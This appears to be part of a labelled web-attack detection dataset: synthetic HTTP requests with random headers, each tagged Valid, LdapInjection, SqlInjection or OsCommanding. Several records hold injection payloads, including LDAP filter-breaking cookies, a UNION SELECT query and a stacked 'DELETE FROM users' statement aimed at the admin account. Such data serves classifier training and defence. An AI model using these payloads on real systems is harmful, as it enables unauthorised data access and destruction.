kLyiFGZ..DQK=oeEkyT&syoekxret0rrehs=rPt&ue3sea13sTa8i=un)(  |  (EeW=*)&Hwhi7e=ns8J858wdJIw

End - Id: 37525
Start - Id: 5281
class: Valid
POST /b-O@Pxv/ib2caO.html? HTTP/1.0
Content-Length: 73
Content-Language: FOaiSa2U
Content-Encoding: compress
Content-Location: /ei3nl4t.php4
Content-MD5: c3loZWllbzdicnJvZWlwZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Aug 06 20:35:39 UTC
Last-Modified: Fri, 20 Mar 09 19:42:46 CET
Host: www.di9mec.fr:80
Connection: Ahohoysp
Accept: video/*
Accept-Charset: iso-8859-6;q=0.7, iso-8859-2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.203.178.102
Cookie: iecrH1nlne=tn?s0;phn=oIc4LJo5
Cookie2: $Version="82"
Date: Tue, 20 Nov 07 22:33:37 CET
ETag: "TiPtZqe-ErUpLYpGLK7c"
Expect: aoyzi
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sat, 11 Sep 04 10:59:17 CET
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: "AK0-9pAq1bF83zyeg_c0"
If-None-Match: *
If-Range: Fri, 21 Oct 05 06:10:14 GMT
Max-Forwards: 46
MIME-Version: 9.9
Pragma: ete0noy='hibfgQ'
Proxy-Authorization: aghv eebTs=nisatc
Authorization: NTLM b25iZEFuSWVheW1ybmV3clJsbGVsMWFpMnJhYVRyY0hobzByc25jb2hUZWV0aA==
Range: 44-,39-,850121-
Referer: /oee1tatt/cgnua/Uuin4L/eries.tiff
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/1.8 (X11; U; Unix 4.4; l5-5o; rv:3.2.0) Gecko/15991812
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/4.7 www.vtiLHest.js, 3.9 241.246.250.19:08841
Transfer-Encoding: compress
Upgrade: vnWhh/6.9, 0cx/5.3
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 811738271596
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

evalS9havingNIselect0z_in=38647&s1e=egwetyrn&grlsrxwyehnlr=;documenti7-

End - Id: 5281
Start - Id: 26700
class: Valid
GET /v47opt_wBC5/e-OS_PF-2mdw/ncT/t-5-KpubhDLS/e@CX7/w0W8Too@MYZ1GP-s7IJl/cwNsrn6zoeaSib0rte/aMjkOQll.bwsu8M.cfm?gdtRus7dle=sy%3EwuexecrkP7ieootelnettoso&ellejaajiniR=l2%40Fh5D1&s2Auu=4827172821&eBp=I0e3iuftxo&cpserbvs=7hH9t&iycpHafnte=340212&iasn2Es6l=37898&ietaD1w=0 HTTP/1.0
Host: 133.211.9.103
Connection: keep-alive
Accept: application/*
Accept-Charset: euc-tw, euc-jp, koi8-r;q=0.8, cp-932;q=0.3, windows-1255;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 12.213.50.115
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="85"
Date: Fri, 15 Jul 05 09:49:24 CET
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: erpEn@cctbogs3k.biz
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 22 Dec 04 08:01:55 CET
If-Match: "blFgaSqGfn-Ofz_y"
If-None-Match: *
If-Range: Tue, 22 Aug 06 04:20:16 CET
Max-Forwards: 40
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: onmbd yavoeb=tOonl
Range: 381788-6807
Referer: http://www.wM897.org/ne53/tte6l/beaca/vmvoNTea.js
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/5.1 (compatible; aeetpt9du; Open BSD i586; el3a7; e8lrse; ac4iwee)
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 231x546
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: compress
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 574 42.50.42.84 "esbdOnaSdh" 
X-Forwarded-For: 168.224.202.103
X-Serial-Number: 55910
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26700
Start - Id: 30036
class: Valid
GET /erSo/bwaeenebnrEuiresQ.pl?tcsyteaveotE=edt&mi=35945897&uu3tnnvhe=vbscriptdsw+&aGeim=arso%5Dnttwinntsock_streame2sLu%29t HTTP/1.0
Host: 219.204.206.136
Connection: eopaew
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: ttofiss-aCnirgw;q=0.4, r2-5hln;q=0.3, OhX-tqat;q=0.8
Cache-Control: 4heZ='Iie2tiSt'
Client-ip: 222.82.19.248
Cookie: p3apdnecfg=ohtsnHjhttpsk mfejb
Cookie2: $Version="97"
Date: Thu, 23 Mar 06 08:14:53 GMT
ETag: "sXT13TQc@X8@GvN3"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Sat, 26 Nov 05 05:22:48 UTC
If-Unmodified-Since: Wed, 24 Dec 08 15:51:43 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Jun 08 01:05:37 GMT
Max-Forwards: 68
MIME-Version: 5.6
Pragma: gtindn=cesam2ct
Proxy-Authorization: Digest cnonce="oonrssi3"
Authorization: vntmr Xhedwnde=blla
Range: -161,91297-7682
Referer: http://www.oriclu.be/ecNyouI/cydrcg.php3
TE: deflate;q=0.2,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.1 (Windows; U; WinNT 7.4; he-rt; rv:5.3.7) Gecko/07299082
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 796x660
Via: FTP/3.3 100.82.184.175:16, 0.0 110.210.107.214
Transfer-Encoding: compress
Upgrade: s81lie/1.8, naydi/8.7, srsna/2.2, pnie/8.0, phcti/3.8
Warning: 470 115.53.98.44 "adyveundimmN0s" 
X-Forwarded-For: 123.131.64.169
X-Serial-Number: 2857393
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30036
Start - Id: 32125
class: Valid
GET /5ckZf/6zsN/pieuc/ut/WzVm.yqHt/trp1sedhM2thlf/mhneteis8heraostTfA.js?Owtecriztvas8=1WVc&8UtfuszreJ9e=lHvXR&eVdeletei=yupdate&jaAzshd=olebx&uweLE=e9exect&HjMsD3=Ayif&oEde=ohoadedochhr&i9B6dropLRa=eDPK6dH&ere7unaoyAerlea=uKqtTQtD HTTP/1.1
Host: www.trnnscsE.it
Connection: itf1js
Accept: audio/*;q=0.9
Accept-Charset: iso-8859-6;q=0.5, big5
Accept-Encoding: 
Accept-Language: toss-piz, bOen-kwwo
Cache-Control: no-store
Client-ip: 70.112.71.224
Cookie: nmsadrTtlna=7ssaGes7qaDb;eitc9etoa=48829799;zftpWWz=493;eao1d=5Rakisa;esExstl4283=nnGQpP@02Z1I;1fel=neticatnph-
Cookie2: $Version="322"
Date: Tue, 03 Feb 09 07:22:27 CET
ETag: "wFNocMSn@Ml4dBVEYNk"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: leaama@iezirdm.it
If-Modified-Since: Fri, 11 Feb 05 16:34:58 CET
If-Unmodified-Since: Tue, 27 Sep 05 10:48:45 GMT
If-Match: *
If-None-Match: "ea_LcTny7g@y-8L2"
If-Range: *
Max-Forwards: 107
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: NTLM ZWlhRWNFY3Z5ZWU0OEl0c2hvbmVuS2xteWlhZWl0aW51bWVMbnE=
Range: -158831,4-,452-53031
Referer: http://www.tl2lrh.net/adiLao/icat/AMhx.gif
TE: trailers,chunked;q=0.6,gzip;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 3.0; ms-he; rv:5.7.0) Gecko/88189406
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0780x902
Via: 7.1 86.26.88.129, 4.9 168.121.104.120
Transfer-Encoding: EhAho; idbut=hnEeih
Upgrade: anW/4.2, ol7Ee/0.0, eny/4.3
Warning: 844 www.ECasr.js:179 "r0atdh" "Fri, 02 Dec 05 20:31:21 UTC"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32125
Start - Id: 29809
class: Valid
GET /Lly/sLSs_wXESc2/iiirsneghysr/c4aerj6rhxnhg/Au/U7Hande/uKvqaz/cmoN/kulogopttGXZ/Bdieplxnkjrrhoraf287/eoUeLscriptdRqKGTZ/wlB86bJbZrCf61p4zb.png? HTTP/1.1
Host: 245.206.97.146:0
Connection: close
Accept: text/html;q=0.3
Accept-Charset: x-mac-turkish, windows-1251;q=0.4, big5;q=0.2, cp-950, euc-kr
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 173.222.100.215
Cookie: crn=Q'n-haro0dservicesernnzlocation ls;eohAunekvis=c.Mb@UM;uy1ooenee1e=mgrxfBStj;elugct=4qosautfi8nh3
Cookie2: $Version="8"
Date: Sat, 02 Oct 04 18:48:22 CET
ETag: W/"GIwrpMQ.o6OQe0zZPs"
Expect: Ffelot
From: 4hgys@hnenh.de
If-Modified-Since: Mon, 01 Nov 04 12:05:59 UTC
If-Unmodified-Since: Fri, 27 Apr 07 13:10:31 UTC
If-Match: "ATJ-tDxZf1KskfKjRZd"
If-None-Match: "Vaz9mgbaJhBDJra"
If-Range: Tue, 16 Sep 08 15:11:17 CET
Max-Forwards: 1906
MIME-Version: 0.0
Pragma: itvA=osd
Proxy-Authorization: al17t nuoirww=cirn
Authorization: NTLM eWFpZXlUZGxkVGltbmlTYmFhaWVkZTFmaW5vOHNlZWhlanVmOWV0
Range: 2-,-34748,32-787788
Referer: http://www.erUrnx.net/r3Otht5e/s4ifg/j9ond/o6sn9o.nsf
TE: trailers,gzip;q=0.2
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 7.6; rd-nd; rv:3.4.6) Gecko/36410292
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 928x800
Via: 4.6 23.19.97.164, HTTP/8.8 248.84.228.162
Transfer-Encoding: deflate
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 059 www.lasqa5r.html "lrats1i" "Fri, 30 Jan 09 14:33:15 GMT"
X-Forwarded-For: 199.39.79.249
X-Serial-Number: 9258897383132
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29809
Start - Id: 24986
class: Valid
GET /A2/oha/tsnuayinset7u1ceuum/n9BdgSiTE/iBo/tEdwYOXWGcLfEkGE3U6/g00hEec0TLD0/@ushutdown/qwSVdropBT8UNFaORautoexec/nuim7viihbhrlyf.gif?lqelewesqrde3r=enknetcatprocessing-instruction68wtmpmochainCjdAi+a&ziOrc5=jhzTvG&rlcalpea3=149126&2BVucqp=hscor&rrouet=gIxh6sribt&dihr=eoIa8Tds&tsootislee3=yeoLJx&tdS=83614312&k29xhiEGbir=rLehblyofytznIaTes&yatisledmtna=5955&Z-@-=eaaesamed%2F%2BpH+%40ttas%3Bt+&iafbp=98071756&zten8re=kOF05&i1=%24ind&iohdelEb=96 HTTP/1.0
Host: www.btJe3gowec.uk
Connection: niz2RMS
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity
Accept-Language: *;q=0.8
Cache-Control: q0='en6Ewo4'
Client-ip: 178.60.165.47
Cookie: hheewj79NBo=2;cc7siHs0sc=72499381;1sta=1074
Cookie2: $Version="016"
Date: Fri, 26 Dec 08 13:25:52 CET
ETag: W/"CvQ_dK.kzcRNGW9HuX"
Expect: 100-continue
From: ipnejdn@dgaeae.gov
If-Modified-Since: Wed, 19 Nov 08 18:32:57 UTC
If-Unmodified-Since: Fri, 07 May 04 17:41:39 UTC
If-Match: "0tGrZa96XzhHoFzAatz"
If-None-Match: *
If-Range: Tue, 18 Dec 07 20:26:00 UTC
Max-Forwards: 336
MIME-Version: 8.6
Pragma: d=iibaasgr
Proxy-Authorization: Digest nc=80E9BD9d
Authorization: keyp aeneRa=deLb
Range: -67,790189-2941
Referer: http://www.daOu6f.com/arcl8/nniaRo4l/ersae.jpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: byrmezmiesnet7c
UA-CPU: x86
UA-Disp: 7088,5005,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 669x906
Via: HTTP/9.1 189.203.77.236, 3.3 206.66.31.215, tsrs/6.2 142.159.179.12:04
Transfer-Encoding: identity
Upgrade: ttwss/6.4, hfsue/2.6, scs/4.5, hecCt/7.3
Warning: 673 www.f25afno0.jpeg "eEZts4sgvmehth" 
X-Forwarded-For: 254.29.12.40
X-Serial-Number: 4634746
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24986
Start - Id: 39061
class: LdapInjection
POST /eWsw97/KhJPhCoT/T_x.kG/seEgsotssiKeeancvmd.gif? HTTP/1.0
Content-Length: 61
Content-Language: tsYAta2o,iEvf,nxvr
Content-Encoding: gzip
Content-Location: /6yvg/jyEtn.jsp
Content-MD5: ZWNjZWlzZW9yZWdxdHk1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Dec 07 03:19:22 GMT
Last-Modified: Fri, 30 Jan 04 12:48:15 CET
Host: 227.9.165.46
Connection: aels
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=409
Client-ip: 48.137.231.218
Cookie: tRhsx3lktCsa=82)(&(objectClass=fIar)(|(sn=   hsrv)(cn=boeH    J*))
Cookie2: $Version="5"
Date: Sat, 16 Feb 08 22:54:22 UTC
ETag: W/"GV.-p7iDbQ9NP6FHl.ae"
Expect: 100-continue
From: icaden@piqhAfS1E.uk
If-Modified-Since: Sat, 05 Sep 09 21:27:27 GMT
If-Unmodified-Since: Thu, 23 Feb 06 07:11:36 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Apr 08 17:17:52 CET
Max-Forwards: 0
MIME-Version: 5.0
Pragma: azoda='4aEan'
Proxy-Authorization: usrL exto=oweCE
Authorization: Digest uri=http://htI4o.fr/cnurcq/ftnuatNc/yanxlitn.doc
Range: -436
Referer: /iStsYeo/hzetbre/motd5tmr.cgi
TE: trailers,chunked;q=0.9,gzip
Trailer: Expect
User-Agent: Mozilla/5.3 (compatible; MSIE 7.1; Unix; y6rcoytv)
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: WtxYa/8.7 www.ertc.html, tdEik/4.7 www.n9ndx.png, HTTP/2.6 95.157.135.107
Transfer-Encoding: 66tto; 6lrcHda=gyecft
Upgrade: AoeT/2.5, uic/2.7, Eiudri/3.6, l7gN/4.2
Warning: 030 103.121.67.250 "ereFagttoerTnEa" 
X-Serial-Number: 53018392304378
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NQusrVV=389393767&K@MAcQQf9=lmpqpasswdgt&otRkbuY=ensesaoudeeR

End - Id: 39061
Start - Id: 39058
class: LdapInjection
POST /at8guoal5iltnFgeber/odtuleSunrisos3wd/btm/Msock_streamit7HJ.shtml? HTTP/1.0
Content-Length: 174
Content-Language: sso,eaipdd,lsdtier
Content-Encoding: compress
Content-Location: http://osrviu.be/ardbteet/h5t5onev/aur9a/sSei.cfm
Content-MD5: ZG50aHNBejdoRTducjdvOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Aug 07 13:06:41 GMT
Last-Modified: Thu, 04 May 06 13:18:14 UTC
Host: www.psdvubfsx.uk
Connection: close
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.3, compress, deflate, compress;q=0.5
Accept-Language: h-anegd, c-zhl, r-bcaie
Cache-Control: only-if-cached
Client-ip: 48.137.231.218
Cookie: s08tneWspetguet=esqrm)( |  (j64bT=*)
Cookie2: $Version="914"
Date: Fri, 09 Oct 09 18:11:00 UTC
ETag: "BmfIbWTVu3mqx3pn"
Expect: 100-continue
From: usrosog@zeinoez.it
If-Modified-Since: Sun, 04 Jan 09 11:15:42 CET
If-Unmodified-Since: Thu, 17 May 07 19:30:23 CET
If-Match: "4OG8Q9qRLHexsEo"
If-None-Match: "NNwSdKQzinZS_tFS3y"
If-Range: *
Max-Forwards: 67
MIME-Version: 8.9
Pragma: hia=tt5Gstoa
Proxy-Authorization: usrL exto=oweCE
Authorization: omd8 dYhhtc6=zubnnee
Range: 2-
Referer: /7ung8g/yowaex.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.2 (X11; U; Linux i386 1.1; og-av; rv:6.7.9) Gecko/82747247
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0434x6105
Via: FTP/3.9 www.cye7.html, 3.1 www.hcAaIn.jpeg
Transfer-Encoding: deflate
Upgrade: gPce2/7.1, oera/8.7, plyti5/7.4, 84fe/7.1
Warning: 616 www.oufen.tiff:438 "otmetonsOo4nSzn" "Thu, 20 Sep 07 04:20:47 GMT"
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kEe=03293&e1aso=me3iefSetoEqeugh6&fe=ecq&xtkeysedWarc5Sg=rSkD1HlA&iutr=leaHtehMeDslnj&1e=fusryysssq&eRevutEtS=3QOaW&QagwHUAalla=sa3oenxDeAcnt&SaRbhseCteia=ye&e9q=0deOaacnsa2y

End - Id: 39058
Start - Id: 17891
class: Valid
GET /eFelyVYc0p9dhzSDF/u7ZNJdjBC4k3/eJIseKXBzW/i6na0e3iv/nbrtcNexre/isiswnn8n1mdl/ThhorueRa/r6.WIntQwRnbY-.gif?nn.nW=ghe6qa&hhhqmfdcavlo=%3Eneg&7mooos=4817&TecTuhiIn=3+aheGa35pji&GnL.y=Sminclude&wtltor=eeode4cl&ekm=phoee7neto&mTcBi9k-Cnph-=qee&I2FQZjB3E4=xu4eubipei HTTP/1.0
Host: 3.233.97.73
Connection: close
Accept: application/*;q=0.8
Accept-Charset: euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: rbcab7c-erNtezQE;q=0.6
Cache-Control: max-age=7
Client-ip: 235.44.149.89
Cookie: netsztoa=eacgosYpd2se;aodzc4icnto=i;nseneEnspa=ncsoimTs;kun5NndAt3a=23562559
Cookie2: $Version="5"
Date: Tue, 22 May 07 11:44:11 CET
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: rdny@hctpuostk.cz
If-Modified-Since: Thu, 16 Apr 09 10:26:30 GMT
If-Unmodified-Since: Sun, 25 Mar 07 08:29:23 GMT
If-Match: *
If-None-Match: *
If-Range: "ZurzCTx-0i@Bgg-"
Max-Forwards: 391
MIME-Version: 3.8
Pragma: ceidtf='adx'
Proxy-Authorization: Digest realm
Authorization: Aerf wexZot=okwho6ts
Range: -87,9893-
Referer: http://seocwdes.gov/f3uv/rarmg.exe
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.6 (X11; U; Linux i586 6.1; tr-dl; rv:6.1.3) Gecko/36671506
UA-CPU: Sparc
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 7.5 130.20.56.53
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 3494344
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17891
Start - Id: 26674
class: Valid
GET /rHroreuwrretltoj/s7PssOaSJR.E4/irinlnd9soide56os/nVl_HtG-WGd@k.shtml?usbhf=7elatcat8el%3Cabls%24&tetgrlH7qbt7nda=iei9jQ2Z8&wea=6looilurs+po&znathbl6k1=l%7Efrom&Z52tJ_96=e06t8h&iP3ftz=ulK&ErTp3aw1mbehe4=d&9d=oE8irtNscriptSutvtV&b9fJ=86968&lyaglrrhs7O=and+nageegbe+2s8t&nottsrs3il=rob&odsEivn=655735 HTTP/1.1
Host: www.rsgi.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: *
Accept-Language: ntd0-01gninnh, r5e-neao4;q=0.4, ssri-r;q=0.4
Cache-Control: max-age=429
Client-ip: 197.217.166.9
Cookie: oogoomeSugy=qe;lelnot6j5EE7r=rJW_aN2U
Cookie2: $Version="931"
Date: Sat, 20 Sep 08 21:14:26 UTC
ETag: W/"sqjo2_PQydPj6pq"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 27 Jul 09 01:19:49 GMT
If-Unmodified-Since: Sat, 09 May 09 03:11:35 GMT
If-Match: *
If-None-Match: "i80nTMsuAxDy9KG"
If-Range: *
Max-Forwards: 275
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: Digest cnonce="iepcolim"
Range: -931372,028-677
Referer: /ogeed/qatmit.pdf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 0.9; mi-li; rv:1.2.6) Gecko/77059328
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 190x433
Via: 3.1 www.0tyRhhn.jpg, 6.8 192.93.43.233:29
Transfer-Encoding: identity
Upgrade: ottfS/3.5, uako/7.9, ttm/6.7, eol/3.3
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 116.189.185.38
X-Serial-Number: 5910196051122866
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26674
Start - Id: 12592
class: Valid
GET /eUSSD0y6jedsm/aU9NwAmfY/eK88Cfm9J/uk@UimC./vEasblerrdYH1/0MrN3MPnxMI/PVVV0OuWi3aCTRg/tatnheghn6sn/_rW@gEH.tiff?YSlTK3@=3983356 HTTP/1.1
Host: 132.86.91.86:80
Connection: eCat0o
Accept: application/*, video/quicktime;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.8, gzip;q=0.5
Accept-Language: rmiliO-Ea
Cache-Control: no-store
Client-ip: 38.23.43.37
Cookie: n4acdeaat2dui=966716307;3rgiiomhm=fieA5ts)f\;ifiyoonxs=95238;oieL5hioAjiYD4=ahreifeoFsC
Cookie2: $Version="5"
Date: Mon, 30 Jun 08 18:14:56 UTC
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: opri=sytIlovD
From: Hsttkg@positcooU.be
If-Modified-Since: Sat, 13 Jun 09 03:46:57 CET
If-Unmodified-Since: Fri, 29 Oct 04 05:57:23 UTC
If-Match: *
If-None-Match: "hJTIwMWAzcCgExrV-"
If-Range: *
Max-Forwards: 0682
MIME-Version: 4.9
Pragma: eonT='AetYI'
Proxy-Authorization: ohlend 5tstwcsv=aehbgNa
Authorization: Basic dnM4YWh1Om5lMnRw
Range: 6-190
Referer: /bcNoeena/bttT/scns5be.jsp
TE: chunked;q=0.1,chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.5 (Windows; U; WinNT 8.6; ui-nx; rv:0.9.1) Gecko/40050440
UA-CPU: StrongARM
UA-Disp: 4818,526,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 280x609
Via: 2.8 215.71.2.5, HTTP/5.4 www.txntsge.jpeg
Transfer-Encoding: egntro; cpgtlB=a7il
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3472507595174879
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12592
Start - Id: 42585
class: SqlInjection
GET /6KUE1/sErshNKt-uwXn1m8v1/locationTAITb/hqeWgLSeoTV5wB78w/ad1Sti/7KZ4P/thie0ighritewriw/eN9EX/Relcnsfi.swf?rdws76i6e3=%27++%29++UNION+ALL+++SELECT+++1341%2C599%2C30%2C74%2C5+++++FROM+++++opseo++++WHERE+%28++%27%27+%3D%27 HTTP/1.1
Host: www.ontnm.de
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale=9
Client-ip: 4.56.84.190
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Wed, 08 Aug 07 20:54:07 GMT
ETag: W/"ndcVEpE9UKtBcNm"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 04 Apr 04 22:10:17 GMT
If-Unmodified-Since: Sun, 18 Apr 10 06:11:22 GMT
If-Match: "X940-vBvQ9LT@e8h"
If-None-Match: *
If-Range: Tue, 26 Oct 04 06:49:16 GMT
Max-Forwards: 89
MIME-Version: 1.0
Pragma: 02so3=o
Proxy-Authorization: Basic Y2llZ2U6bml0aWQ=
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: http://www.Usaiooa.de/Zetti/c9umtsxf.bin
TE: trailers,gzip;q=0.0
Trailer: From
User-Agent: eH5cKE http://www.eoets5.org
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: identity
Upgrade: ilaa/5.9, idlc4/7.8, uer/9.3, ttwuf/4.1, veDF/9.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42585
Start - Id: 42001
class: SqlInjection
GET /ons0snITuouerepynaa/0Ek5vj-z_p/fEvU.q5ML/r1Nqp@bOVwq6/esoflicqeecie.mspx?cFzabmkscdh4an=9&xa7ghs27=931&Y2cx=91388725&e0dcotoo=ea5h%2B&aijio=hdf3xtntlAy&lmf2a=889&ne=q_xEH&ama=obo&BFjLszT0S=nN4seapt&VB8YVJAP=a25IvhPa&erjsOtsiyyia5i3=24VOvtU&ottw7oi=ssystemheH&4Reohrbo=67699039&UkOWrhavingZIT=vclf%27+++%29%3BDELETEFROMusersWHEREupper%28username%29+++%3D+upper%28+++%27admin&te=7rtoeopt%3EtduEmetaalln9rdA9 HTTP/1.1
Host: 84.208.15.107
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale=4
Client-ip: 134.245.214.117
Cookie: ginputwherelN=d;crien5o=9728037;n3irqswo1tcwei=tbmuy5
Cookie2: $Version="554"
Date: Sun, 31 May 09 06:36:27 UTC
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: ns3gzos
From: wXro@erouh.com
If-Modified-Since: Tue, 29 Sep 09 07:21:06 UTC
If-Unmodified-Since: Mon, 07 Jan 08 01:48:18 CET
If-Match: "g3Uw3IsOzYHI0mWmYBY"
If-None-Match: "TWkahLQWMbHAc9mcpRd"
If-Range: *
Max-Forwards: 06
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest qop=auth
Range: -728027,84041-8,736156-
Referer: /aRwg.msf
TE: deflate,trailers
Trailer: Trailer
User-Agent: e8m74R http://www.rtneS8.fr
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: 3.7 231.241.184.146:8957, 8.3 221.60.38.0
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42001
Start - Id: 43442
class: OsCommanding
